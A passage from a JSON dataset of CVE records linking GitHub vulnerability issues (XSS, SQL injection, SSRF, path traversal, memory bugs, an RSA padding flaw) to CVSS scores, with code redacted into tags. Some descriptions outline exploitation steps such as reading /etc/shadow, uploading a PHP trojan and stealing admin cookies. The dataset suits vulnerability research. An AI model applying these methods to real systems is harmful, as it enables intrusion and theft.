  65803. "severity": "MEDIUM",
  65804. "baseScore": 5.3,
  65805. "impactScore": 1.4,
  65806. "exploitabilityScore": 3.9
  65807. },
  65808. {
  65809. "CVE_ID": "CVE-2021-30074",
  65810. "Issue_Url_old": "https://github.com/docsifyjs/docsify/issues/1549",
  65811. "Issue_Url_new": "https://github.com/docsifyjs/docsify/issues/1549",
  65812. "Repo_new": "docsifyjs/docsify",
  65813. "Issue_Created_At": "2021-03-31T02:44:15Z",
  65814. "description": "FILETAG NUMBERTAG Cross Site Scripting . APITAG APITAG APITAG APITAG APITAG Bug Report Steps to reproduce NUMBERTAG create a simple docsify project file tree APITAG FILETAG CODETAG FILETAG ERRORTAG FILETAG APITAG NUMBERTAG start a http server FILETAG FILETAG when user search something near XSS payload and the javascript which should rendering as markdown will be execute NUMBERTAG input x in search filed FILETAG What is current behaviour What is the expected behaviour Other relevant information APITAG [ ] Bug does still occur when all/other plugins are disabled? Your OS: Mac OS FILETAG version: APITAG npm/yarn version: Browser version: Docsify version NUMBERTAG Docsify plugins: search.js APITAG Please create a reproducible sandbox FILETAG Mention the docsify version in which this bug was not present (if any)",
  65815. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65816. "severity": "MEDIUM",
  65817. "baseScore": 6.1,
  65818. "impactScore": 2.7,
  65819. "exploitabilityScore": 2.8
  65820. },
  65821. {
  65822. "CVE_ID": "CVE-2021-30081",
  65823. "Issue_Url_old": "https://github.com/emlog/emlog/issues/74",
  65824. "Issue_Url_new": "https://github.com/emlog/emlog/issues/74",
  65825. "Repo_new": "emlog/emlog",
  65826. "Issue_Created_At": "2021-03-31T16:05:45Z",
  65827. "description": "emlog NUMBERTAG stable has SQL Injection vulnerability. Login Required APITAG in FILETAG line NUMBERTAG ERRORTAG There is no filtering for the pages parameter and passed into the APITAG method. in PATHTAG line NUMBERTAG ERRORTAG obviously, there is an INSERT SQL Injection vulnerability,we can use single quotation marks to close and inject. use burpsuite and sqlmap to verify this vulnerability: APITAG APITAG",
  65828. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  65829. "severity": "HIGH",
  65830. "baseScore": 8.8,
  65831. "impactScore": 5.9,
  65832. "exploitabilityScore": 2.8
  65833. },
  65834. {
  65835. "CVE_ID": "CVE-2021-30082",
  65836. "Issue_Url_old": "https://github.com/dignajar/gris/issues/3",
  65837. "Issue_Url_new": "https://github.com/dignajar/gris/issues/3",
  65838. "Repo_new": "dignajar/gris",
  65839. "Issue_Created_At": "2021-04-01T01:47:16Z",
  65840. "description": "Gris CMS NUMBERTAG has Persistent XSS vulnerability. A xss vulnerability was discovered in Gris CMS NUMBERTAG There is a Persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via admin/dashboard APITAG APITAG",
  65841. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65842. "severity": "MEDIUM",
  65843. "baseScore": 6.1,
  65844. "impactScore": 2.7,
  65845. "exploitabilityScore": 2.8
  65846. },
  65847. {
  65848. "CVE_ID": "CVE-2021-30083",
  65849. "Issue_Url_old": "https://github.com/WebFairyNet/Mediat/issues/3",
  65850. "Issue_Url_new": "https://github.com/webfairynet/mediat/issues/3",
  65851. "Repo_new": "WebFairyNet/Mediat",
  65852. "Issue_Created_At": "2021-04-01T06:12:22Z",
  65853. "description": "Mediat NUMBERTAG login page exists an XSS vulnerability. FILETAG has XSS via the return parameter. POC: APITAG APITAG",
  65854. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65855. "severity": "MEDIUM",
  65856. "baseScore": 6.1,
  65857. "impactScore": 2.7,
  65858. "exploitabilityScore": 2.8
  65859. },
  65860. {
  65861. "CVE_ID": "CVE-2021-30108",
  65862. "Issue_Url_old": "https://github.com/liufee/cms/issues/57",
  65863. "Issue_Url_new": "https://github.com/liufee/cms/issues/57",
  65864. "Repo_new": "liufee/cms",
  65865. "Issue_Created_At": "2021-04-01T06:38:09Z",
  65866. "description": "SSRF vulnerability in feehicms NUMBERTAG This is a Server side request forgery vulnerability. We can change HTTP Referer Header to any url, then the server will request it. Details are as follows: We need to send two requests NUMBERTAG First register an account normally, here my account is test NUMBERTAG and the password is NUMBERTAG Log out of our account and log in again from the picture below FILETAG use burpsuite change the http Referer Header, FILETAG The first POC request is as follows CODETAG NUMBERTAG Login with our account and password FILETAG use burpsuite , We don't modify anything The second POC request is as follows CODETAG Then we found that the response packet of the second request contained a NUMBERTAG jump, The jump url is the Referrer header of our first request packet The response of the second request packet is as follows FILETAG NUMBERTAG ulnerability proof FILETAG FILETAG NUMBERTAG how to fix FILETAG",
  65867. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  65868. "severity": "CRITICAL",
  65869. "baseScore": 9.1,
  65870. "impactScore": 5.2,
  65871. "exploitabilityScore": 3.9
  65872. },
  65873. {
  65874. "CVE_ID": "CVE-2021-30111",
  65875. "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/4",
  65876. "Issue_Url_new": "https://github.com/0xrayan/cves/issues/4",
  65877. "Repo_new": "0xrayan/cves",
  65878. "Issue_Created_At": "2021-04-08T00:48:15Z",
  65879. "description": "CVETAG . Product : Web School ERP NUMBERTAG Description : A stored XSS vulnerability exists in Web School ERP NUMBERTAG ia APITAG Events) in the event name and description fields. An attack can inject a APITAG code that will be stored in the page. If any visitor sees the events, then the payload will be executed.. Recommendation NUMBERTAG Ensure that any user input is properly sanitized NUMBERTAG Use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur POC : Google Drive URLTAG",
  65880. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65881. "severity": "MEDIUM",
  65882. "baseScore": 5.4,
  65883. "impactScore": 2.7,
  65884. "exploitabilityScore": 2.3
  65885. },
  65886. {
  65887. "CVE_ID": "CVE-2021-30112",
  65888. "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/3",
  65889. "Issue_Url_new": "https://github.com/0xrayan/cves/issues/3",
  65890. "Repo_new": "0xrayan/cves",
  65891. "Issue_Created_At": "2021-04-08T00:37:35Z",
  65892. "description": "CVETAG . Product : Web School ERP NUMBERTAG Description : Web School ERP NUMBERTAG contains a cross site request forgery (CSRF) vulnerability that allows a remote attacker to create a student_leave_application request through PATHTAG The application fails to validate the CSRF token for a POST request using Guardian privilege. Recommendations NUMBERTAG Implement APITAG and make sure it's validating in back end server as well NUMBERTAG Implement an interceptor which appends token value to every (state changing) request in custom request header APITAG Video POC : Google Drive URLTAG POC : CODETAG",
  65893. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  65894. "severity": "MEDIUM",
  65895. "baseScore": 6.5,
  65896. "impactScore": 3.6,
  65897. "exploitabilityScore": 2.8
  65898. },
  65899. {
  65900. "CVE_ID": "CVE-2021-30113",
  65901. "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/1",
  65902. "Issue_Url_new": "https://github.com/0xrayan/cves/issues/1",
  65903. "Repo_new": "0xrayan/cves",
  65904. "Issue_Created_At": "2021-04-08T00:19:05Z",
  65905. "description": "CVETAG . Product : Web School ERP NUMBERTAG Description: A blind XSS vulnerability exists in Web School ERP NUMBERTAG ia APITAG Events) in the event name field & description field. An attacker can inject a APITAG code that will be stored in the page. If any visitor sees the event, then the payload will be executed and sends the victim's information to the attacker website. Recommendation Ensure that any user input is properly sanitized POC : _As shown below it's the output from XSS Hunter Server_ FILETAG FILETAG DOM ERRORTAG",
  65906. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65907. "severity": "MEDIUM",
  65908. "baseScore": 6.1,
  65909. "impactScore": 2.7,
  65910. "exploitabilityScore": 2.8
  65911. },
  65912. {
  65913. "CVE_ID": "CVE-2021-30114",
  65914. "Issue_Url_old": "https://github.com/0xrayan/CVEs/issues/2",
  65915. "Issue_Url_new": "https://github.com/0xrayan/cves/issues/2",
  65916. "Repo_new": "0xrayan/cves",
  65917. "Issue_Created_At": "2021-04-08T00:29:10Z",
  65918. "description": "CVETAG . Product : Web School ERP NUMBERTAG Description : Web School ERP NUMBERTAG contains a cross site request forgery (CSRF) vulnerability that allows a remote attacker to create a voucher payment request through PATHTAG The application fails to validate the CSRF token for a POST request using admin privilege. Recommendations NUMBERTAG Implement APITAG and make sure it's validating in back end server as well NUMBERTAG Implement an interceptor which appends token value to every (state changing) request in custom request header APITAG Video POC : Google Drive URLTAG POC : ERRORTAG",
  65919. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  65920. "severity": "MEDIUM",
  65921. "baseScore": 6.5,
  65922. "impactScore": 3.6,
  65923. "exploitabilityScore": 2.8
  65924. },
  65925. {
  65926. "CVE_ID": "CVE-2021-3013",
  65927. "Issue_Url_old": "https://github.com/BurntSushi/ripgrep/issues/1773",
  65928. "Issue_Url_new": "https://github.com/burntsushi/ripgrep/issues/1773",
  65929. "Repo_new": "burntsushi/ripgrep",
  65930. "Issue_Created_At": "2021-01-03T09:02:48Z",
  65931. "description": "FILETAG . (As I couldn't find proper contact information to report a vulnerability, I used the email from URLTAG Since I believe this vulnerability can be exploited, I'm not publishing the detail here. MENTIONTAG Can you check the inbox, please?",
  65932. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  65933. "severity": "CRITICAL",
  65934. "baseScore": 9.8,
  65935. "impactScore": 5.9,
  65936. "exploitabilityScore": 3.9
  65937. },
  65938. {
  65939. "CVE_ID": "CVE-2021-30141",
  65940. "Issue_Url_old": "https://github.com/friendica/friendica/issues/10110",
  65941. "Issue_Url_new": "https://github.com/friendica/friendica/issues/10110",
  65942. "Repo_new": "friendica/friendica",
  65943. "Issue_Created_At": "2021-04-01T18:23:33Z",
  65944. "description": "An unauthenticated visitor can access a path like PATHTAG FILETAG Expected Result: Access denied error page. Platform Info Friendica Version NUMBERTAG rc Friendica Source: git PHP version NUMBERTAG SQL version: APITAG NUMBERTAG",
  65945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65946. "severity": "HIGH",
  65947. "baseScore": 7.5,
  65948. "impactScore": 3.6,
  65949. "exploitabilityScore": 3.9
  65950. },
  65951. {
  65952. "CVE_ID": "CVE-2021-30151",
  65953. "Issue_Url_old": "https://github.com/mperham/sidekiq/issues/4852",
  65954. "Issue_Url_new": "https://github.com/sidekiq/sidekiq/issues/4852",
  65955. "Repo_new": "sidekiq/sidekiq",
  65956. "Issue_Created_At": "2021-03-24T21:56:32Z",
  65957. "description": "Cross site scripting (XSS). Hi there, I found an XSS vulnerability affecting version NUMBERTAG and maybe anything below that. APITAG URLTAG",
  65958. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65959. "severity": "MEDIUM",
  65960. "baseScore": 6.1,
  65961. "impactScore": 2.7,
  65962. "exploitabilityScore": 2.8
  65963. },
  65964. {
  65965. "CVE_ID": "CVE-2021-3019",
  65966. "Issue_Url_old": "https://github.com/maybe-why-not/lanproxy/issues/1",
  65967. "Issue_Url_new": "https://github.com/maybe-why-not/lanproxy/issues/1",
  65968. "Repo_new": "maybe-why-not/lanproxy",
  65969. "Issue_Created_At": "2021-01-05T02:36:29Z",
  65970. "description": "Path traversal vulnerability in lanproxy leads to connection to the intranet. Vendor of the product: URLTAG Payload: URLTAG Read configuration file FILETAG Configure the proxy to connect to the intranet after logging in with the password FILETAG Read /etc/shadow FILETAG Fingerprint: URLTAG FILETAG",
  65971. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  65972. "severity": "HIGH",
  65973. "baseScore": 7.5,
  65974. "impactScore": 3.6,
  65975. "exploitabilityScore": 3.9
  65976. },
  65977. {
  65978. "CVE_ID": "CVE-2021-30199",
  65979. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1728",
  65980. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1728",
  65981. "Repo_new": "gpac/gpac",
  65982. "Issue_Created_At": "2021-04-02T10:42:56Z",
  65983. "description": "A Null Pointer Dereference In function gf_filter_pck_get_data. In APITAG There is a Null Pointer Dereference, when call APITAG . The first arg pck may be null with a crafted mp4 file. The command line: FILETAG In gdb: FILETAG The crafted file: FILETAG",
  65984. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65985. "severity": "MEDIUM",
  65986. "baseScore": 5.5,
  65987. "impactScore": 3.6,
  65988. "exploitabilityScore": 1.8
  65989. },
  65990. {
  65991. "CVE_ID": "CVE-2021-30209",
  65992. "Issue_Url_old": "https://github.com/textpattern/textpattern/issues/1655",
  65993. "Issue_Url_new": "https://github.com/textpattern/textpattern/issues/1655",
  65994. "Repo_new": "textpattern/textpattern",
  65995. "Issue_Created_At": "2021-03-18T13:11:46Z",
  65996. "description": "Hi I found two loopholes.. Hi I found two loopholes. In version NUMBERTAG The first one: The location where the plug in is uploaded in the background without any security verification. You can upload Trojan files to obtain system permissions. The second one: the storage type xss exists in the place where the article is written. Next are the details of the exploit: The first vulnerability: Because the backend login location does not have a verification code and no lock policy is set, if an attacker enters the backend through brute force cracking, the attacker can upload the php Trojan file, because the file path after saving is regular , So the attacker can connect to the Trojan horse file through a hacker tool to obtain system permissions. FILETAG Access to Trojan files to verify that the vulnerability exists. FILETAG Hacking tools connect to Trojan files to obtain system permissions. FILETAG The second vulnerability: If a low privilege user uses the vulnerability to write malicious code and publish it, all people who view this article will be attacked. He can obtain the administrator\u2019s cookie information, and the administrator\u2019s cookie can be used directly by the administrator. Log in to the background system with permission. You can also continue to exploit the first vulnerability after logging in. FILETAG The administrator's access to the article triggers a pop up window to verify that the vulnerability exists. FILETAG The attacker obtains the administrator cookie. FILETAG Repair suggestions: The first vulnerability: verify the format of the uploaded file, verify the content of the file, and set the uploaded file name to random. The second vulnerability: html entity conversion or filtering of sensitive words input by the user, such as <, >,', \", script.",
  65997. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  65998. "severity": "MEDIUM",
  65999. "baseScore": 6.5,
  66000. "impactScore": 3.6,
  66001. "exploitabilityScore": 2.8
  66002. },
  66003. {
  66004. "CVE_ID": "CVE-2021-30218",
  66005. "Issue_Url_old": "https://github.com/michaelforney/samurai/issues/67",
  66006. "Issue_Url_new": "https://github.com/michaelforney/samurai/issues/67",
  66007. "Repo_new": "michaelforney/samurai",
  66008. "Issue_Created_At": "2021-04-02T17:48:35Z",
  66009. "description": "NULL pointer dereference in the APITAG function. Hi, While fuzzing samurai NUMBERTAG and git nightly repo), I found a NULL pointer dereference in the APITAG function, in util.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  66010. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66011. "severity": "MEDIUM",
  66012. "baseScore": 5.5,
  66013. "impactScore": 3.6,
  66014. "exploitabilityScore": 1.8
  66015. },
  66016. {
  66017. "CVE_ID": "CVE-2021-30219",
  66018. "Issue_Url_old": "https://github.com/michaelforney/samurai/issues/68",
  66019. "Issue_Url_new": "https://github.com/michaelforney/samurai/issues/68",
  66020. "Repo_new": "michaelforney/samurai",
  66021. "Issue_Created_At": "2021-04-02T17:58:51Z",
  66022. "description": "NULL pointer dereference in the APITAG function. Hi, While fuzzing samurai NUMBERTAG and git nightly repo), I found a NULL pointer dereference in the APITAG function, in build.c. CODETAG In the code snippet, it seems there are no checks on cmd parameter which leads to set the variable description to NULL on L NUMBERTAG and then on L NUMBERTAG it dereferences the NULL Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  66023. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66024. "severity": "MEDIUM",
  66025. "baseScore": 5.5,
  66026. "impactScore": 3.6,
  66027. "exploitabilityScore": 1.8
  66028. },
  66029. {
  66030. "CVE_ID": "CVE-2021-30227",
  66031. "Issue_Url_old": "https://github.com/emlog/emlog/issues/79",
  66032. "Issue_Url_new": "https://github.com/emlog/emlog/issues/79",
  66033. "Repo_new": "emlog/emlog",
  66034. "Issue_Created_At": "2021-04-05T09:06:50Z",
  66035. "description": "emlog NUMBERTAG has XSS Vulnerability . \u5728\u6587\u7ae0\u8bc4\u8bba\u5904\u63d0\u4ea4\u8bc4\u8bba FILETAG \u7136\u540e\u5728\u540e\u53f0\u67e5\u770b\u8bc4\u8bba\uff0c\u70b9\u51fb FILETAG",
  66036. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  66037. "severity": "MEDIUM",
  66038. "baseScore": 6.1,
  66039. "impactScore": 2.7,
  66040. "exploitabilityScore": 2.8
  66041. },
  66042. {
  66043. "CVE_ID": "CVE-2021-30246",
  66044. "Issue_Url_old": "https://github.com/kjur/jsrsasign/issues/478",
  66045. "Issue_Url_new": "https://github.com/kjur/jsrsasign/issues/478",
  66046. "Repo_new": "kjur/jsrsasign",
  66047. "Issue_Created_At": "2021-04-02T05:31:06Z",
  66048. "description": "Leniency in parsing block type byte and padding bytes for PKCS NUMBERTAG signature verification. Another finding besides the incompatibility issue reported here URLTAG for PKCS NUMBERTAG signature verification, is the leniency in parsing the prefix of PKCS NUMBERTAG structure. Background. The prefix to the top ASN NUMBERTAG structure of the PKCS NUMBERTAG encoded message consists of leading byte ( APITAG ), block type byte ( APITAG for RSA signing scheme), padding bytes ( APITAG ), and the end of padding ( APITAG ). The length of padding bytes should also be at least NUMBERTAG bytes and computed such that the final length of the PKCS NUMBERTAG encoded message is equal to the length of public modolous N (denoted by APITAG ). Block type byte is there to indicate to which RSA scheme this encoded message is belonged. The end of padding also specifies where padding bytes actually ends. The leading byte ( APITAG ) also guarantees that the integer representative of the encoded message is not greater than or equal to the public modolous N . By and large, the prefix bytes should satisfy the requirements in order for RSA PKS NUMBERTAG signature scheme to be able to hold on to its security promises. Problem. However, jsrsasign APITAG is lenient in checking such requirements and some other invalid signatures are mistakenly recognized to be valid. As will be shown below in the snippet taken from the source code, the issue arises because the implementation ignores the initial APITAG bytes as they will disappear in octet strings to integer translation and more importantly the fact that an incorrect regex pattern matching is being used to peel off the prefix from the the top ASN NUMBERTAG structure. This bug seems to be of similar type previously reported on RSA PSS signature validation URLTAG . More detailed root cause analysis. In line APITAG @ APITAG function in APITAG file, the initial APITAG bytes will be ignored when octet strings are converted to integer ( APITAG ) and converted back to octet strings after taking modular exponentiation to the power public exponent ( APITAG and APITAG ). The regex being used in APITAG to remove the prefix only checks for the initial string APITAG . So, it does not actually check for the padding bytes ( APITAG ) and can be bypassed by long initial zeros (examples are given). ERRORTAG Implication: APITAG issue) As this might not be susceptible to an immediate signature forgery attack because without the ability to hide random bytes, the attack cost seems to be prohibitive. However, this can simply create an interoperability issue. Reference notation and concrete values N : public modulus APITAG : length of public modulus d : private exponent e : public exponent H : hash function m : message I : to be singed RSA PKCS NUMBERTAG signature scheme input structure S : signature value obtained by APITAG CODETAG Example NUMBERTAG Padding bytes with length NUMBERTAG APITAG CODETAG Example NUMBERTAG All zero bytes as prefix CODETAG CODETAG Example NUMBERTAG It can start with some number of APITAG bytes, and then APITAG byte followed by some APITAG bytes ending with APITAG byte. CODETAG CODETAG",
  66049. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  66050. "severity": "CRITICAL",
  66051. "baseScore": 9.1,
  66052. "impactScore": 5.2,
  66053. "exploitabilityScore": 3.9
  66054. },
  66055. {
  66056. "CVE_ID": "CVE-2021-30476",
  66057. "Issue_Url_old": "https://github.com/hashicorp/terraform-provider-vault/issues/996",
  66058. "Issue_Url_new": "https://github.com/hashicorp/terraform-provider-vault/issues/996",
  66059. "Repo_new": "hashicorp/terraform-provider-vault",
  66060. "Issue_Created_At": "2021-03-12T18:05:11Z",
  66061. "description": "vault_gcp_auth_backend_role does not apply bound_labels. The APITAG resource does not apply bound_labels URLTAG to the vault auth method. Earlier this week while debugging an issue I tried to authenticate to my vault from a VM that did not have the the APITAG that I had defined in my terraform configuration... To my surprise my authentication was successful, this led me down the route of finding out why terraform was lying to me. Terraform Version APITAG Affected Resource(s) vault_gcp_auth_backend_role Terraform Configuration Files CODETAG Expected Behavior Terraform should apply the security controls that it says it does for the vault provider. Actual Behavior Terraform does not install the APITAG configuration to the APITAG resource. Steps to Reproduce CODETAG",
  66062. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66063. "severity": "CRITICAL",
  66064. "baseScore": 9.8,
  66065. "impactScore": 5.9,
  66066. "exploitabilityScore": 3.9
  66067. },
  66068. {
  66069. "CVE_ID": "CVE-2021-30498",
  66070. "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/53",
  66071. "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/53",
  66072. "Repo_new": "cacalabs/libcaca",
  66073. "Issue_Created_At": "2021-04-07T02:31:14Z",
  66074. "description": "[ Security] heap buffer overflow of export.c in function export_tga. Hi libcaca Team When I use the libfuzz test library API, I found an overflow error. Here are the steps to reproduce and my running environment System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Fedora NUMBERTAG clang NUMBERTAG gcc NUMBERTAG erification steps\uff1a APITAG the source code of libcaca APITAG the libcaca.so library APITAG or CODETAG APITAG the poc_tga.cc && build ERRORTAG NUMBERTAG compile poc_tga.cc APITAG APITAG poc_tga asan info: ERRORTAG",
  66075. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66076. "severity": "HIGH",
  66077. "baseScore": 7.8,
  66078. "impactScore": 5.9,
  66079. "exploitabilityScore": 1.8
  66080. },
  66081. {
  66082. "CVE_ID": "CVE-2021-30499",
  66083. "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/54",
  66084. "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/54",
  66085. "Repo_new": "cacalabs/libcaca",
  66086. "Issue_Created_At": "2021-04-07T02:36:51Z",
  66087. "description": "APITAG global buffer overflow of export.c in function export_troff. Hi libcaca Team When I use the libfuzz test library API, I found an overflow error. Here are the steps to reproduce and my running environment System info\uff1a Ubuntu NUMBERTAG clang NUMBERTAG gcc NUMBERTAG Fedora NUMBERTAG clang NUMBERTAG gcc NUMBERTAG libcaca version APITAG Verification steps\uff1a APITAG the source code of libcaca APITAG the libcaca.so library APITAG or CODETAG APITAG the poc_troff.cc && build ERRORTAG NUMBERTAG compile poc_troff.cc CODETAG APITAG poc_troff asan info: ERRORTAG",
  66088. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66089. "severity": "HIGH",
  66090. "baseScore": 7.8,
  66091. "impactScore": 5.9,
  66092. "exploitabilityScore": 1.8
  66093. },
  66094. {
  66095. "CVE_ID": "CVE-2021-30500",
  66096. "Issue_Url_old": "https://github.com/upx/upx/issues/485",
  66097. "Issue_Url_new": "https://github.com/upx/upx/issues/485",
  66098. "Repo_new": "upx/upx",
  66099. "Issue_Created_At": "2021-04-07T02:45:58Z",
  66100. "description": "Null pointer dereference in function APITAG APITAG What's the problem (or question)? Null pointer dereference was discovered in upx in the latest commit of the devel branch. FILETAG Please tell us details about your environment. UPX version used ( APITAG ): CODETAG Host Operating System and version: OS: Ubuntu NUMBERTAG LTS NUMBERTAG Host CPU architecture: CPU: Intel i NUMBERTAG GHz Target Operating System and version: same as Host Target CPU architecture: same as Host",
  66101. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66102. "severity": "HIGH",
  66103. "baseScore": 7.8,
  66104. "impactScore": 5.9,
  66105. "exploitabilityScore": 1.8
  66106. },
  66107. {
  66108. "CVE_ID": "CVE-2021-30501",
  66109. "Issue_Url_old": "https://github.com/upx/upx/issues/486",
  66110. "Issue_Url_new": "https://github.com/upx/upx/issues/486",
  66111. "Repo_new": "upx/upx",
  66112. "Issue_Created_At": "2021-04-07T07:13:11Z",
  66113. "description": "APITAG assertions again in function APITAG APITAG What's the problem (or question)? Same problem like issue NUMBERTAG URLTAG but not fix all the bug position. APITAG is attempted to be allocated with NUMBERTAG bytes, failing an assertion in APITAG asan CODETAG gdb ERRORTAG What should have happened? No failed assertions. Do you have an idea for a solution? Either remove the assertion (probably easier), or add logic to check that allocations are NUMBERTAG bytes. or like the c NUMBERTAG b NUMBERTAG URLTAG add some sanitize code. How can we reproduce the issue? APITAG UPX APITAG NUMBERTAG Run APITAG zipped poc : FILETAG Please tell us details about your environment. UPX version used ( APITAG ): CODETAG Host Operating System and version: APITAG Host CPU architecture: APITAG Target Operating System and version: same as Host Target CPU architecture: same as Host",
  66114. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66115. "severity": "MEDIUM",
  66116. "baseScore": 5.5,
  66117. "impactScore": 3.6,
  66118. "exploitabilityScore": 1.8
  66119. },
  66120. {
  66121. "CVE_ID": "CVE-2021-30637",
  66122. "Issue_Url_old": "https://github.com/danpros/htmly/issues/456",
  66123. "Issue_Url_new": "https://github.com/danpros/htmly/issues/456",
  66124. "Repo_new": "danpros/htmly",
  66125. "Issue_Created_At": "2021-04-13T03:26:18Z",
  66126. "description": "The code has stored XSS vulnerabilities. The XSS filtering of blog title, Tagline, and Description in FILETAG is not rigorous, resulting in the generation of stored XSS FILETAG FILETAG Front display FILETAG",
  66127. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  66128. "severity": "MEDIUM",
  66129. "baseScore": 5.4,
  66130. "impactScore": 2.7,
  66131. "exploitabilityScore": 2.3
  66132. },
  66133. {
  66134. "CVE_ID": "CVE-2021-31162",
  66135. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/83618",
  66136. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/83618",
  66137. "Repo_new": "rust-lang/rust",
  66138. "Issue_Created_At": "2021-03-28T20:48:16Z",
  66139. "description": "Double free in Vec::from_iter specialization when drop panics. URLTAG URLTAG APITAG calls APITAG . APITAG calls APITAG before overwriting the pointer. As a result, dropped elements are not invalidated and dropped again under panic. APITAG ERRORTAG Output: CODETAG Tested with APITAG . Here is a playground link URLTAG to the code snippet.",
  66140. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  66141. "severity": "CRITICAL",
  66142. "baseScore": 9.8,
  66143. "impactScore": 5.9,
  66144. "exploitabilityScore": 3.9
  66145. },
  66146. {
  66147. "CVE_ID": "CVE-2021-31254",
  66148. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1703",
  66149. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1703",
  66150. "Repo_new": "gpac/gpac",
  66151. "Issue_Created_At": "2021-03-11T08:32:34Z",
  66152. "description": "FILETAG",
  66153. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66154. "severity": "HIGH",
  66155. "baseScore": 7.8,
  66156. "impactScore": 5.9,
  66157. "exploitabilityScore": 1.8
  66158. },
  66159. {
  66160. "CVE_ID": "CVE-2021-31255",
  66161. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1733",
  66162. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1733",
  66163. "Repo_new": "gpac/gpac",
  66164. "Issue_Created_At": "2021-04-08T04:06:31Z",
  66165. "description": "FILETAG",
  66166. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66167. "severity": "HIGH",
  66168. "baseScore": 7.8,
  66169. "impactScore": 5.9,
  66170. "exploitabilityScore": 1.8
  66171. },
  66172. {
  66173. "CVE_ID": "CVE-2021-31256",
  66174. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1705",
  66175. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1705",
  66176. "Repo_new": "gpac/gpac",
  66177. "Issue_Created_At": "2021-03-12T02:25:29Z",
  66178. "description": "FILETAG",
  66179. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  66180. "severity": "MEDIUM",
  66181. "baseScore": 5.5,
  66182. "impactScore": 3.6,
  66183. "exploitabilityScore": 1.8
  66184. },
  66185. {
  66186. "CVE_ID": "CVE-2021-31257",
  66187. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1734",
  66188. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1734",
  66189. "Repo_new": "gpac/gpac",
  66190. "Issue_Created_At": "2021-04-08T04:07:59Z",
  66191. "description": "null dereference in APITAG APITAG Hi, There is a null dereference issue with gpac APITAG can reproduce on the lattest commit. Steps To Reproduce build: APITAG run as: APITAG shows the following log: ERRORTAG Reporter NUMBERTAG n1p3r NUMBERTAG from Topsec Alpha Lab FILETAG",
  66192. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66193. "severity": "MEDIUM",
  66194. "baseScore": 5.5,
  66195. "impactScore": 3.6,
  66196. "exploitabilityScore": 1.8
